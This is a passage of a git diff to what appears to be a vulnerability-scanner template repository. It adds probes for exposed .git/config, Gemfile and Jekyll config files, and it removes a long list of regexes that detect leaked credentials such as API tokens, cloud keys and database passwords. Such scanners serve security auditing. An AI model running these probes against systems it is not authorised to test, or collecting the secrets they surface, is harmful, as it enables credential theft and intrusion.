-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
-        Content-Type: application/x-www-form-urlencoded
-        Content-Length: 1
-        Connection: close
+  - method: GET
+    path:
+      - "{{BaseURL}}/.git/config"
 
     matchers-condition: and
     matchers:
@@ -33,4 +26,4 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
diff --git a/exposures/files/github-gemfile-files.yaml b/exposures/files/github-gemfile-files.yaml
new file mode 100644
index 0000000000..0444367a2f
--- /dev/null
+++ b/exposures/files/github-gemfile-files.yaml
@@ -0,0 +1,32 @@
+id: github-gemfile-files
+
+info:
+  name: Github Gemfiles
+  author: hahwul
+  severity: info
+  description: Find github page files(Gemfile / Gemfile.lock)
+  tags: github,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Gemfile"
+      - "{{BaseURL}}/Gemfile.lock"
+
+    matchers-condition: or
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "https://rubygems.org")'
+          - 'contains(body, "source")'
+          - 'contains(body, "gem")'
+          - 'status_code == 200'
+        condition: and
+
+      - type: dsl
+        dsl:
+          - 'contains(body, "https://rubygems.org")'
+          - 'contains(body, "remote")'
+          - 'contains(body, "specs")'
+          - 'status_code == 200'
+        condition: and
\ No newline at end of file
diff --git a/exposures/files/github-page-config.yaml b/exposures/files/github-page-config.yaml
new file mode 100644
index 0000000000..368ddee069
--- /dev/null
+++ b/exposures/files/github-page-config.yaml
@@ -0,0 +1,26 @@
+id: github-page-config
+
+info:
+  name: Github pages config file
+  author: hahwul
+  severity: info
+  description: Find github pages config file.
+  tags: github,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/_config.yml"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "jekyll"
+          - "title"
+          - "baseurl"
+        condition: and
\ No newline at end of file
diff --git a/exposures/tokens/generic/credentials-disclosure.yaml b/exposures/tokens/generic/credentials-disclosure.yaml
index b2d2154bf5..0670daecbc 100644
--- a/exposures/tokens/generic/credentials-disclosure.yaml
+++ b/exposures/tokens/generic/credentials-disclosure.yaml
@@ -26,690 +26,691 @@ requests:
       - type: regex
         part: body
         regex:
-          - "zopim[_-]?account[_-]?key(=| =|:| :)"
-          - "zhuliang[_-]?gh[_-]?token(=| =|:| :)"
-          - "zensonatypepassword(=| =|:| :)"
-          - "zendesk[_-]?travis[_-]?github(=| =|:| :)"
-          - "yt[_-]?server[_-]?api[_-]?key(=| =|:| :)"
-          - "yt[_-]?partner[_-]?refresh[_-]?token(=| =|:| :)"
-          - "yt[_-]?partner[_-]?client[_-]?secret(=| =|:| :)"
-          - "yt[_-]?client[_-]?secret(=| =|:| :)"
-          - "yt[_-]?api[_-]?key(=| =|:| :)"
-          - "yt[_-]?account[_-]?refresh[_-]?token(=| =|:| :)"
-          - "yt[_-]?account[_-]?client[_-]?secret(=| =|:| :)"
-          - "yangshun[_-]?gh[_-]?token(=| =|:| :)"
-          - "yangshun[_-]?gh[_-]?password(=| =|:| :)"
-          - "www[_-]?googleapis[_-]?com(=| =|:| :)"
-          - "wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64(=| =|:| :)"
-          - "wpt[_-]?ssh[_-]?connect(=| =|:| :)"
-          - "wpt[_-]?report[_-]?api[_-]?key(=| =|:| :)"
-          - "wpt[_-]?prepare[_-]?dir(=| =|:| :)"
-          - "wpt[_-]?db[_-]?user(=| =|:| :)"
-          - "wpt[_-]?db[_-]?password(=| =|:| :)"
-          - "wporg[_-]?password(=| =|:| :)"
-          - "wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key(=| =|:| :)"
-          - "wordpress[_-]?db[_-]?user(=| =|:| :)"
-          - "wordpress[_-]?db[_-]?password(=| =|:| :)"
-          - "wincert[_-]?password(=| =|:| :)"
-          - "widget[_-]?test[_-]?server(=| =|:| :)"
-          - "widget[_-]?fb[_-]?password[_-]?3(=| =|:| :)"
-          - "widget[_-]?fb[_-]?password[_-]?2(=| =|:| :)"
-          - "widget[_-]?fb[_-]?password(=| =|:| :)"
-          - "widget[_-]?basic[_-]?password[_-]?5(=| =|:| :)"
-          - "widget[_-]?basic[_-]?password[_-]?4(=| =|:| :)"
-          - "widget[_-]?basic[_-]?password[_-]?3(=| =|:| :)"
-          - "widget[_-]?basic[_-]?password[_-]?2(=| =|:| :)"
-          - "widget[_-]?basic[_-]?password(=| =|:| :)"
-          - "watson[_-]?password(=| =|:| :)"
-          - "watson[_-]?device[_-]?password(=| =|:| :)"
-          - "watson[_-]?conversation[_-]?password(=| =|:| :)"
-          - "wakatime[_-]?api[_-]?key(=| =|:| :)"
-          - "vscetoken(=| =|:| :)"
-          - "visual[_-]?recognition[_-]?api[_-]?key(=| =|:| :)"
-          - "virustotal[_-]?apikey(=| =|:| :)"
-          - "vip[_-]?github[_-]?deploy[_-]?key[_-]?pass(=| =|:| :)"
-          - "vip[_-]?github[_-]?deploy[_-]?key(=| =|:| :)"
-          - "vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key(=| =|:| :)"
-          - "v[_-]?sfdc[_-]?password(=| =|:| :)"
-          - "v[_-]?sfdc[_-]?client[_-]?secret(=| =|:| :)"
-          - "usertravis(=| =|:| :)"
-          - "user[_-]?assets[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
-          - "user[_-]?assets[_-]?access[_-]?key[_-]?id(=| =|:| :)"
-          - "use[_-]?ssh(=| =|:| :)"
-          - "us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com(=| =|:| :)"
-          - "urban[_-]?secret(=| =|:| :)"
-          - "urban[_-]?master[_-]?secret(=| =|:| :)"
-          - "urban[_-]?key(=| =|:| :)"
-          - "unity[_-]?serial(=| =|:| :)"
-          - "unity[_-]?password(=| =|:| :)"
-          - "twitteroauthaccesstoken(=| =|:| :)"
-          - "twitteroauthaccesssecret(=| =|:| :)"
-          - "twitter[_-]?consumer[_-]?secret(=| =|:| :)"
-          - "twitter[_-]?consumer[_-]?key(=| =|:| :)"
-          - "twine[_-]?password(=| =|:| :)"
-          - "twilio[_-]?token(=| =|:| :)"
-          - "twilio[_-]?sid(=| =|:| :)"
-          - "twilio[_-]?configuration[_-]?sid(=| =|:| :)"
-          - "twilio[_-]?chat[_-]?account[_-]?api[_-]?service(=| =|:| :)"
-          - "twilio[_-]?api[_-]?secret(=| =|:| :)"
-          - "twilio[_-]?api[_-]?key(=| =|:| :)"
-          - "trex[_-]?okta[_-]?client[_-]?token(=| =|:| :)"
-          - "trex[_-]?client[_-]?token(=| =|:| :)"
-          - "travis[_-]?token(=| =|:| :)"
-          - "travis[_-]?secure[_-]?env[_-]?vars(=| =|:| :)"
-          - "travis[_-]?pull[_-]?request(=| =|:| :)"
-          - "travis[_-]?gh[_-]?token(=| =|:| :)"
-          - "travis[_-]?e2e[_-]?token(=| =|:| :)"
-          - "travis[_-]?com[_-]?token(=| =|:| :)"
-          - "travis[_-]?branch(=| =|:| :)"
-          - "travis[_-]?api[_-]?token(=| =|:| :)"
-          - "travis[_-]?access[_-]?token(=| =|:| :)"
-          - "token[_-]?core[_-]?java(=| =|:| :)"
-          - "thera[_-]?oss[_-]?access[_-]?key(=| =|:| :)"
-          - "tester[_-]?keys[_-]?password(=| =|:| :)"
-          - "test[_-]?test(=| =|:| :)"
-          - "test[_-]?github[_-]?token(=| =|:| :)"
-          - "tesco[_-]?api[_-]?key(=| =|:| :)"
-          - "svn[_-]?pass(=| =|:| :)"
-          - "surge[_-]?token(=| =|:| :)"
-          - "surge[_-]?login(=| =|:| :)"
-          - "stripe[_-]?public(=| =|:| :)"
-          - "stripe[_-]?private(=| =|:| :)"
-          - "strip[_-]?secret[_-]?key(=| =|:| :)"
-          - "strip[_-]?publishable[_-]?key(=| =|:| :)"
-          - "stormpath[_-]?api[_-]?key[_-]?secret(=| =|:| :)"
-          - "stormpath[_-]?api[_-]?key[_-]?id(=| =|:| :)"
-          - "starship[_-]?auth[_-]?token(=| =|:| :)"
-          - "starship[_-]?account[_-]?sid(=| =|:| :)"
-          - "star[_-]?test[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
-          - "star[_-]?test[_-]?location(=| =|:| :)"
-          - "star[_-]?test[_-]?bucket(=| =|:| :)"
-          - "star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
-          - "staging[_-]?base[_-]?url[_-]?runscope(=| =|:| :)"
-          - "ssmtp[_-]?config(=| =|:| :)"
-          - "sshpass(=| =|:| :)"
-          - "srcclr[_-]?api[_-]?token(=| =|:| :)"
-          - "square[_-]?reader[_-]?sdk[_-]?repository[_-]?password(=| =|:| :)"
-          - "sqssecretkey(=| =|:| :)"
-          - "sqsaccesskey(=| =|:| :)"
-          - "spring[_-]?mail[_-]?password(=| =|:| :)"
-          - "spotify[_-]?api[_-]?client[_-]?secret(=| =|:| :)"
-          - "spotify[_-]?api[_-]?access[_-]?token(=| =|:| :)"
-          - "spaces[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
-          - "spaces[_-]?access[_-]?key[_-]?id(=| =|:| :)"
-          - "soundcloud[_-]?password(=| =|:| :)"
-          - "soundcloud[_-]?client[_-]?secret(=| =|:| :)"
-          - "sonatypepassword(=| =|:| :)"
-          - "sonatype[_-]?token[_-]?user(=| =|:| :)"
-          - "sonatype[_-]?token[_-]?password(=| =|:| :)"
-          - "sonatype[_-]?password(=| =|:| :)"
-          - "sonatype[_-]?pass(=| =|:| :)"
-          - "sonatype[_-]?nexus[_-]?password(=| =|:| :)"
-          - "sonatype[_-]?gpg[_-]?passphrase(=| =|:| :)"
-          - "sonatype[_-]?gpg[_-]?key[_-]?name(=| =|:| :)"
-          - "sonar[_-]?token(=| =|:| :)"
-          - "sonar[_-]?project[_-]?key(=| =|:| :)"
-          - "sonar[_-]?organization[_-]?key(=| =|:| :)"
-          - "socrata[_-]?password(=| =|:| :)"
-          - "socrata[_-]?app[_-]?token(=| =|:| :)"
-          - "snyk[_-]?token(=| =|:| :)"
-          - "snyk[_-]?api[_-]?token(=| =|:| :)"
-          - "snoowrap[_-]?refresh[_-]?token(=| =|:| :)"
-          - "snoowrap[_-]?password(=| =|:| :)"
-          - "snoowrap[_-]?client[_-]?secret(=| =|:| :)"
-          - "slate[_-]?user[_-]?email(=| =|:| :)"
-          - "slash[_-]?developer[_-]?space[_-]?key(=| =|:| :)"
-          - "slash[_-]?developer[_-]?space(=| =|:| :)"
-          - "signing[_-]?key[_-]?sid(=| =|:| :)"
-          - "signing[_-]?key[_-]?secret(=| =|:| :)"
-          - "signing[_-]?key[_-]?password(=| =|:| :)"
-          - "signing[_-]?key(=| =|:| :)"
-          - "setsecretkey(=| =|:| :)"
-          - "setdstsecretkey(=| =|:| :)"
-          - "setdstaccesskey(=| =|:| :)"
-          - "ses[_-]?secret[_-]?key(=| =|:| :)"
-          - "ses[_-]?access[_-]?key(=| =|:| :)"
-          - "service[_-]?account[_-]?secret(=| =|:| :)"
-          - "sentry[_-]?key(=| =|:| :)"
-          - "sentry[_-]?endpoint(=| =|:| :)"
-          - "sentry[_-]?default[_-]?org(=| =|:| :)"
-          - "sentry[_-]?auth[_-]?token(=| =|:| :)"
-          - "sendwithus[_-]?key(=| =|:| :)"
-          - "sendgrid[_-]?username(=| =|:| :)"
-          - "sendgrid[_-]?user(=| =|:| :)"
-          - "sendgrid[_-]?password(=| =|:| :)"
-          - "sendgrid[_-]?key(=| =|:| :)"
-          - "sendgrid[_-]?api[_-]?key(=| =|:| :)"
-          - "sendgrid(=| =|:| :)"
-          - "selion[_-]?selenium[_-]?host(=| =|:| :)"
-          - "selion[_-]?log[_-]?level[_-]?dev(=| =|:| :)"
-          - "segment[_-]?api[_-]?key(=| =|:| :)"
-          - "secretkey(=| =|:| :)"
-          - "secretaccesskey(=| =|:| :)"
-          - "secret[_-]?key[_-]?base(=| =|:| :)"
-          - "secret[_-]?9(=| =|:| :)"
-          - "secret[_-]?8(=| =|:| :)"
-          - "secret[_-]?7(=| =|:| :)"
-          - "secret[_-]?6(=| =|:| :)"
-          - "secret[_-]?5(=| =|:| :)"
-          - "secret[_-]?4(=| =|:| :)"
-          - "secret[_-]?3(=| =|:| :)"
-          - "secret[_-]?2(=| =|:| :)"
-          - "secret[_-]?11(=| =|:| :)"
-          - "secret[_-]?10(=| =|:| :)"
-          - "secret[_-]?1(=| =|:| :)"
-          - "secret[_-]?0(=| =|:| :)"
-          - "sdr[_-]?token(=| =|:| :)"
-          - "scrutinizer[_-]?token(=| =|:| :)"
-          - "sauce[_-]?access[_-]?key(=| =|:| :)"
-          - "sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
-          - "sandbox[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
-          - "sandbox[_-]?access[_-]?token(=| =|:| :)"
-          - "salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token(=| =|:| :)"
-          - "salesforce[_-]?bulk[_-]?test[_-]?password(=| =|:| :)"
-          - "sacloud[_-]?api(=| =|:| :)"
-          - "sacloud[_-]?access[_-]?token[_-]?secret(=| =|:| :)"
-          - "sacloud[_-]?access[_-]?token(=| =|:| :)"
-          - "s3[_-]?user[_-]?secret(=| =|:| :)"
-          - "s3[_-]?secret[_-]?key(=| =|:| :)"
-          - "s3[_-]?secret[_-]?assets(=| =|:| :)"
-          - "s3[_-]?secret[_-]?app[_-]?logs(=| =|:| :)"
-          - "s3[_-]?key[_-]?assets(=| =|:| :)"
-          - "s3[_-]?key[_-]?app[_-]?logs(=| =|:| :)"
-          - "s3[_-]?key(=| =|:| :)"
-          - "s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com(=| =|:| :)"
-          - "s3[_-]?bucket[_-]?name[_-]?assets(=| =|:| :)"
-          - "s3[_-]?bucket[_-]?name[_-]?app[_-]?logs(=| =|:| :)"
-          - "s3[_-]?access[_-]?key[_-]?id(=| =|:| :)"
-          - "s3[_-]?access[_-]?key(=| =|:| :)"
-          - "rubygems[_-]?auth[_-]?token(=| =|:| :)"
-          - "rtd[_-]?store[_-]?pass(=| =|:| :)"
-          - "rtd[_-]?key[_-]?pass(=| =|:| :)"
-          - "route53[_-]?access[_-]?key[_-]?id(=| =|:| :)"
-          - "ropsten[_-]?private[_-]?key(=| =|:| :)"
-          - "rinkeby[_-]?private[_-]?key(=| =|:| :)"
-          - "rest[_-]?api[_-]?key(=| =|:| :)"
-          - "repotoken(=| =|:| :)"
-          - "reporting[_-]?webdav[_-]?url(=| =|:| :)"
-          - "reporting[_-]?webdav[_-]?pwd(=| =|:| :)"
-          - "release[_-]?token(=| =|:| :)"
-          - "release[_-]?gh[_-]?token(=| =|:| :)"
-          - "registry[_-]?secure(=| =|:| :)"
-          - "registry[_-]?pass(=| =|:| :)"
-          - "refresh[_-]?token(=| =|:| :)"
-          - "rediscloud[_-]?url(=| =|:| :)"
-          - "redis[_-]?stunnel[_-]?urls(=| =|:| :)"
-          - "randrmusicapiaccesstoken(=| =|:| :)"
-          - "rabbitmq[_-]?password(=| =|:| :)"
-          - "quip[_-]?token(=| =|:| :)"
-          - "qiita[_-]?token(=| =|:| :)"
-          - "pypi[_-]?passowrd(=| =|:| :)"
-          - "pushover[_-]?token(=| =|:| :)"
-          - "publish[_-]?secret(=| =|:| :)"
-          - "publish[_-]?key(=| =|:| :)"
-          - "publish[_-]?access(=| =|:| :)"
-          - "project[_-]?config(=| =|:| :)"
-          - "prod[_-]?secret[_-]?key(=| =|:| :)"
-          - "prod[_-]?password(=| =|:| :)"
-          - "prod[_-]?access[_-]?key[_-]?id(=| =|:| :)"
-          - "private[_-]?signing[_-]?password(=| =|:| :)"
-          - "pring[_-]?mail[_-]?username(=| =|:| :)"
-          - "preferred[_-]?username(=| =|:| :)"
-          - "prebuild[_-]?auth(=| =|:| :)"
-          - "postgresql[_-]?pass(=| =|:| :)"
-          - "postgresql[_-]?db(=| =|:| :)"
-          - "postgres[_-]?env[_-]?postgres[_-]?password(=| =|:| :)"
-          - "postgres[_-]?env[_-]?postgres[_-]?db(=| =|:| :)"
-          - "plugin[_-]?password(=| =|:| :)"
-          - "plotly[_-]?apikey(=| =|:| :)"
-          - "places[_-]?apikey(=| =|:| :)"
-          - "places[_-]?api[_-]?key(=| =|:| :)"
-          - "pg[_-]?host(=| =|:| :)"
-          - "pg[_-]?database(=| =|:| :)"
-          - "personal[_-]?secret(=| =|:| :)"
-          - "personal[_-]?key(=| =|:| :)"
-          - "percy[_-]?token(=| =|:| :)"
-          - "percy[_-]?project(=| =|:| :)"
-          - "paypal[_-]?client[_-]?secret(=| =|:| :)"
-          - "passwordtravis(=| =|:| :)"
-          - "parse[_-]?js[_-]?key(=| =|:| :)"
-          - "pagerduty[_-]?apikey(=| =|:| :)"
-          - "packagecloud[_-]?token(=| =|:| :)"
-          - "ossrh[_-]?username(=| =|:| :)"
-          - "ossrh[_-]?secret(=| =|:| :)"
-          - "ossrh[_-]?password(=| =|:| :)"
-          - "ossrh[_-]?pass(=| =|:| :)"
-          - "ossrh[_-]?jira[_-]?password(=| =|:| :)"
-          - "os[_-]?password(=| =|:| :)"
-          - "os[_-]?auth[_-]?url(=| =|:| :)"
-          - "org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password(=| =|:| :)"
-          - "org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password(=| =|:| :)"
-          - "openwhisk[_-]?key(=| =|:| :)"
-          - "open[_-]?whisk[_-]?key(=| =|:| :)"
-          - "onesignal[_-]?user[_-]?auth[_-]?key(=| =|:| :)"
-          - "onesignal[_-]?api[_-]?key(=| =|:| :)"
-          - "omise[_-]?skey(=| =|:| :)"
-          - "omise[_-]?pubkey(=| =|:| :)"
-          - "omise[_-]?pkey(=| =|:| :)"
-          - "omise[_-]?key(=| =|:| :)"
-          - "okta[_-]?oauth2[_-]?clientsecret(=| =|:| :)"
-          - "okta[_-]?oauth2[_-]?client[_-]?secret(=| =|:| :)"
-          - "okta[_-]?client[_-]?token(=| =|:| :)"
-          - "ofta[_-]?secret(=| =|:| :)"
-          - "ofta[_-]?region(=| =|:| :)"
-          - "ofta[_-]?key(=| =|:| :)"
-          - "octest[_-]?password(=| =|:| :)"
-          - "octest[_-]?app[_-]?username(=| =|:| :)"
-          - "octest[_-]?app[_-]?password(=| =|:| :)"
-          - "oc[_-]?pass(=| =|:| :)"
-          - "object[_-]?store[_-]?creds(=| =|:| :)"
-          - "object[_-]?store[_-]?bucket(=| =|:| :)"
-          - "object[_-]?storage[_-]?region[_-]?name(=| =|:| :)"
-          - "object[_-]?storage[_-]?password(=| =|:| :)"
-          - "oauth[_-]?token(=| =|:| :)"
-          - "numbers[_-]?service[_-]?pass(=| =|:| :)"
-          - "nuget[_-]?key(=| =|:| :)"
-          - "nuget[_-]?apikey(=| =|:| :)"
-          - "nuget[_-]?api[_-]?key(=| =|:| :)"
-          - "npm[_-]?token(=| =|:| :)"
-          - "npm[_-]?secret[_-]?key(=| =|:| :)"
-          - "npm[_-]?password(=| =|:| :)"
-          - "npm[_-]?email(=| =|:| :)"
-          - "npm[_-]?auth[_-]?token(=| =|:| :)"
-          - "npm[_-]?api[_-]?token(=| =|:| :)"
-          - "npm[_-]?api[_-]?key(=| =|:| :)"
-          - "now[_-]?token(=| =|:| :)"
-          - "non[_-]?token(=| =|:| :)"
-          - "node[_-]?pre[_-]?gyp[_-]?secretaccesskey(=| =|:| :)"
-          - "node[_-]?pre[_-]?gyp[_-]?github[_-]?token(=| =|:| :)"
-          - "node[_-]?pre[_-]?gyp[_-]?accesskeyid(=| =|:| :)"
-          - "node[_-]?env(=| =|:| :)"
-          - "ngrok[_-]?token(=| =|:| :)"
-          - "ngrok[_-]?auth[_-]?token(=| =|:| :)"
-          - "nexuspassword(=| =|:| :)"
-          - "nexus[_-]?password(=| =|:| :)"
-          - "new[_-]?relic[_-]?beta[_-]?token(=| =|:| :)"
-          - "netlify[_-]?api[_-]?key(=| =|:| :)"
-          - "nativeevents(=| =|:| :)"
-          - "mysqlsecret(=| =|:| :)"
-          - "mysqlmasteruser(=| =|:| :)"
-          - "mysql[_-]?username(=| =|:| :)"
-          - "mysql[_-]?user(=| =|:| :)"
-          - "mysql[_-]?root[_-]?password(=| =|:| :)"
-          - "mysql[_-]?password(=| =|:| :)"
-          - "mysql[_-]?hostname(=| =|:| :)"
-          - "mysql[_-]?database(=| =|:| :)"
-          - "my[_-]?secret[_-]?env(=| =|:| :)"
-          - "multi[_-]?workspace[_-]?sid(=| =|:| :)"
-          - "multi[_-]?workflow[_-]?sid(=| =|:| :)"
-          - "multi[_-]?disconnect[_-]?sid(=| =|:| :)"
-          - "multi[_-]?connect[_-]?sid(=| =|:| :)"
-          - "multi[_-]?bob[_-]?sid(=| =|:| :)"
-          - "minio[_-]?secret[_-]?key(=| =|:| :)"
-          - "minio[_-]?access[_-]?key(=| =|:| :)"
-          - "mile[_-]?zero[_-]?key(=| =|:| :)"
-          - "mh[_-]?password(=| =|:| :)"
-          - "mh[_-]?apikey(=| =|:| :)"
-          - "mg[_-]?public[_-]?api[_-]?key(=| =|:| :)"
-          - "mg[_-]?api[_-]?key(=| =|:| :)"
-          - "mapboxaccesstoken(=| =|:| :)"
-          - "mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
-          - "mapbox[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
-          - "mapbox[_-]?api[_-]?token(=| =|:| :)"
-          - "mapbox[_-]?access[_-]?token(=| =|:| :)"
-          - "manifest[_-]?app[_-]?url(=| =|:| :)"
-          - "manifest[_-]?app[_-]?token(=| =|:| :)"
-          - "mandrill[_-]?api[_-]?key(=| =|:| :)"
-          - "managementapiaccesstoken(=| =|:| :)"
-          - "management[_-]?token(=| =|:| :)"
-          - "manage[_-]?secret(=| =|:| :)"
-          - "manage[_-]?key(=| =|:| :)"
-          - "mailgun[_-]?secret[_-]?api[_-]?key(=| =|:| :)"
-          - "mailgun[_-]?pub[_-]?key(=| =|:| :)"
-          - "mailgun[_-]?pub[_-]?apikey(=| =|:| :)"
-          - "mailgun[_-]?priv[_-]?key(=| =|:| :)"
-          - "mailgun[_-]?password(=| =|:| :)"
-          - "mailgun[_-]?apikey(=| =|:| :)"
-          - "mailgun[_-]?api[_-]?key(=| =|:| :)"
-          - "mailer[_-]?password(=| =|:| :)"
-          - "mailchimp[_-]?key(=| =|:| :)"
-          - "mailchimp[_-]?api[_-]?key(=| =|:| :)"
-          - "mail[_-]?password(=| =|:| :)"
-          - "magento[_-]?password(=| =|:| :)"
-          - "magento[_-]?auth[_-]?username (=| =|:| :)"
-          - "magento[_-]?auth[_-]?password(=| =|:| :)"
-          - "lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password(=| =|:| :)"
-          - "lottie[_-]?upload[_-]?cert[_-]?key[_-]?password(=| =|:| :)"
-          - "lottie[_-]?s3[_-]?secret[_-]?key(=| =|:| :)"
-          - "lottie[_-]?happo[_-]?secret[_-]?key(=| =|:| :)"
-          - "lottie[_-]?happo[_-]?api[_-]?key(=| =|:| :)"
-          - "looker[_-]?test[_-]?runner[_-]?client[_-]?secret(=| =|:| :)"
-          - "ll[_-]?shared[_-]?key(=| =|:| :)"
-          - "ll[_-]?publish[_-]?url(=| =|:| :)"
-          - "linux[_-]?signing[_-]?key(=| =|:| :)"
-          - "linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key(=| =|:| :)"
-          - "lighthouse[_-]?api[_-]?key(=| =|:| :)"
-          - "lektor[_-]?deploy[_-]?username(=| =|:| :)"
-          - "lektor[_-]?deploy[_-]?password(=| =|:| :)"
-          - "leanplum[_-]?key(=| =|:| :)"
-          - "kxoltsn3vogdop92m(=| =|:| :)"
-          - "kubeconfig(=| =|:| :)"
-          - "kubecfg[_-]?s3[_-]?path(=| =|:| :)"
-          - "kovan[_-]?private[_-]?key(=| =|:| :)"
-          - "keystore[_-]?pass(=| =|:| :)"
-          - "kafka[_-]?rest[_-]?url(=| =|:| :)"
-          - "kafka[_-]?instance[_-]?name(=| =|:| :)"
-          - "kafka[_-]?admin[_-]?url(=| =|:| :)"
-          - "jwt[_-]?secret(=| =|:| :)"
-          - "jdbc:mysql(=| =|:| :)"
-          - "jdbc[_-]?host(=| =|:| :)"
-          - "jdbc[_-]?databaseurl(=| =|:| :)"
-          - "itest[_-]?gh[_-]?token(=| =|:| :)"
-          - "ios[_-]?docs[_-]?deploy[_-]?token(=| =|:| :)"
-          - "internal[_-]?secrets(=| =|:| :)"
-          - "integration[_-]?test[_-]?appid(=| =|:| :)"
-          - "integration[_-]?test[_-]?api[_-]?key(=| =|:| :)"
-          - "index[_-]?name(=| =|:| :)"
-          - "ij[_-]?repo[_-]?username(=| =|:| :)"
-          - "ij[_-]?repo[_-]?password(=| =|:| :)"
-          - "hub[_-]?dxia2[_-]?password(=| =|:| :)"
-          - "homebrew[_-]?github[_-]?api[_-]?token(=| =|:| :)"
-          - "hockeyapp[_-]?token(=| =|:| :)"
-          - "heroku[_-]?token(=| =|:| :)"
-          - "heroku[_-]?email(=| =|:| :)"
-          - "heroku[_-]?api[_-]?key(=| =|:| :)"
-          - "hb[_-]?codesign[_-]?key[_-]?pass(=| =|:| :)"
-          - "hb[_-]?codesign[_-]?gpg[_-]?pass(=| =|:| :)"
-          - "hab[_-]?key(=| =|:| :)"
-          - "hab[_-]?auth[_-]?token(=| =|:| :)"
-          - "grgit[_-]?user(=| =|:| :)"
-          - "gren[_-]?github[_-]?token(=| =|:| :)"
-          - "gradle[_-]?signing[_-]?password(=| =|:| :)"
-          - "gradle[_-]?signing[_-]?key[_-]?id(=| =|:| :)"
-          - "gradle[_-]?publish[_-]?secret(=| =|:| :)"
-          - "gradle[_-]?publish[_-]?key(=| =|:| :)"
-          - "gpg[_-]?secret[_-]?keys(=| =|:| :)"
-          - "gpg[_-]?private[_-]?key(=| =|:| :)"
-          - "gpg[_-]?passphrase(=| =|:| :)"
-          - "gpg[_-]?ownertrust(=| =|:| :)"
-          - "gpg[_-]?keyname(=| =|:| :)"
-          - "gpg[_-]?key[_-]?name(=| =|:| :)"
-          - "google[_-]?private[_-]?key(=| =|:| :)"
-          - "google[_-]?maps[_-]?api[_-]?key(=| =|:| :)"
-          - "google[_-]?client[_-]?secret(=| =|:| :)"
-          - "google[_-]?client[_-]?id(=| =|:| :)"
-          - "google[_-]?client[_-]?email(=| =|:| :)"
-          - "google[_-]?account[_-]?type(=| =|:| :)"
-          - "gogs[_-]?password(=| =|:| :)"
-          - "gitlab[_-]?user[_-]?email(=| =|:| :)"
-          - "github[_-]?tokens(=| =|:| :)"
-          - "github[_-]?token(=| =|:| :)"
-          - "github[_-]?repo(=| =|:| :)"
-          - "github[_-]?release[_-]?token(=| =|:| :)"
-          - "github[_-]?pwd(=| =|:| :)"
-          - "github[_-]?password(=| =|:| :)"
-          - "github[_-]?oauth[_-]?token(=| =|:| :)"
-          - "github[_-]?oauth(=| =|:| :)"
-          - "github[_-]?key(=| =|:| :)"
-          - "github[_-]?hunter[_-]?username(=| =|:| :)"
-          - "github[_-]?hunter[_-]?token(=| =|:| :)"
-          - "github[_-]?deployment[_-]?token(=| =|:| :)"
-          - "github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass(=| =|:| :)"
-          - "github[_-]?client[_-]?secret(=| =|:| :)"
-          - "github[_-]?auth[_-]?token(=| =|:| :)"
-          - "github[_-]?auth(=| =|:| :)"
-          - "github[_-]?api[_-]?token(=| =|:| :)"
-          - "github[_-]?api[_-]?key(=| =|:| :)"
-          - "github[_-]?access[_-]?token(=| =|:| :)"
-          - "git[_-]?token(=| =|:| :)"
-          - "git[_-]?name(=| =|:| :)"
-          - "git[_-]?email(=| =|:| :)"
-          - "git[_-]?committer[_-]?name(=| =|:| :)"
-          - "git[_-]?committer[_-]?email(=| =|:| :)"
-          - "git[_-]?author[_-]?name(=| =|:| :)"
-          - "git[_-]?author[_-]?email(=| =|:| :)"
-          - "ghost[_-]?api[_-]?key(=| =|:| :)"
-          - "ghb[_-]?token(=| =|:| :)"
-          - "gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)"
-          - "gh[_-]?token(=| =|:| :)"
-          - "gh[_-]?repo[_-]?token(=| =|:| :)"
-          - "gh[_-]?oauth[_-]?token(=| =|:| :)"
-          - "gh[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)"
-          - "gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)"
-          - "gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id(=| =|:| :)"
-          - "gh[_-]?next[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)"
-          - "gh[_-]?email(=| =|:| :)"
-          - "gh[_-]?api[_-]?key(=| =|:| :)"
-          - "gcs[_-]?bucket(=| =|:| :)"
-          - "gcr[_-]?password(=| =|:| :)"
-          - "gcloud[_-]?service[_-]?key(=| =|:| :)"
-          - "gcloud[_-]?project(=| =|:| :)"
-          - "gcloud[_-]?bucket(=| =|:| :)"
-          - "ftp[_-]?username(=| =|:| :)"
-          - "ftp[_-]?user(=| =|:| :)"
-          - "ftp[_-]?pw(=| =|:| :)"
-          - "ftp[_-]?password(=| =|:| :)"
-          - "ftp[_-]?login(=| =|:| :)"
-          - "ftp[_-]?host(=| =|:| :)"
